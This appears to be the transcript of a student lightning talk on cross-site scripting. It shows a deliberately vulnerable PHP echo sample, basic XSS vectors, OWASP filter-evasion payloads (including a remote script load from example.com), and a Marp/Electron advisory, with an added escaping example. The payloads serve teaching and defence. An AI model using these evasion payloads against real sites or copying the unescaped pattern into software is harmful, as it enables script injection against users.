Investigating XSS input values / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
2018/02/03 Student LT at freee
Transcript
XSS
B1 | Twitter: @tmyk_kym | https://blog.koyama.me/ | Network/Web/Server/Security | PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting) in HTML: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (3.0)
Sample (PHP):

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello the page becomes:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1>hello</h1>

With $_GET['mode'] = <script>alert()</script> the page becomes:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><script>alert()</script></h1>
XSS: Stored XSS / Reflected XSS / DOM Based XSS
XSS == XSS
    <script>alert(1)</script>
    "><script>alert(1)</script>
    " onmouseover="alert(1)
    x" onerror="alert(1)        <- img src
    javascript:alert(1)         <- a href
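An added example, not code from the slides: the slide's PHP sample beside a hardened version, run over the payloads listed above; the function names and the http(s)-only check for href values are assumptions of my own.

```php
<?php
declare(strict_types=1);

// Vulnerable (the slide's sample): the query parameter is written into the
// page without any encoding.
function render_vulnerable(string $mode): string {
    return '<h1>' . $mode . '</h1>';
}

// Hardened: encode & < > " ' so the value can only ever be text, whether it
// lands in an element body or inside a quoted attribute.
function render_escaped(string $mode): string {
    return '<h1>' . htmlspecialchars($mode, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

// javascript:alert(1) in an href contains no HTML metacharacters, so encoding
// alone does not stop it; URL attributes also need a scheme allowlist.
// (Hypothetical helper, not from the slides.)
function safe_href(string $url): string {
    if (!preg_match('#^https?://#i', trim($url))) {
        return '#';
    }
    return htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed inputs: the vectors from the slides plus a benign value.
$payloads = [
    'hello',
    '<script>alert(1)</script>',
    '"><script>alert(1)</script>',
    '" onmouseover="alert(1)',
    'x" onerror="alert(1)',
];
foreach ($payloads as $p) {
    echo 'raw:     ' . render_vulnerable($p) . PHP_EOL;
    echo 'escaped: ' . render_escaped($p) . PHP_EOL . PHP_EOL;
}
// The first href is rejected by the scheme check, the second is kept and encoded.
echo safe_href('javascript:alert(1)') . PHP_EOL;
echo safe_href('https://example.com/?a=1&b=2') . PHP_EOL;
```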
XSS
? / . XSS . XSS .
?
Source: OWASP XSS Filter Evasion Cheat Sheet (2015): https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    The "/" acts as an attribute separator, so it is parsed as:
    <script xss="" src="http://example.com/xss.js"></script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    Rendered as HTML it becomes:
    "><script>alert("XSS");//<</script>
[3] <img src=x onerror=javas cript:ale rt('XSS')>
    with HTML character references (&#x..., hexadecimal) inserted between the letters, decoded to:
    <img src="x" onerror="javascript:alert('XSS')">
( )
    <img src=javascript:alert('XSS')>
    <img src=javascript: alert(String.fromCharCode(88,83,83))>
    <META HTTP-EQUIV="refresh" CONTENT="3;URL=http://;URL=http://yahoo.co.jp/;">
Electron / Marp: Marp is an Electron app (built on web technologies) ... <script>alert()</script> ... the alert runs ... ( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/
“However, sanitizing inline script should consider on future.” ([Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp)
XSS XSS alert() Electron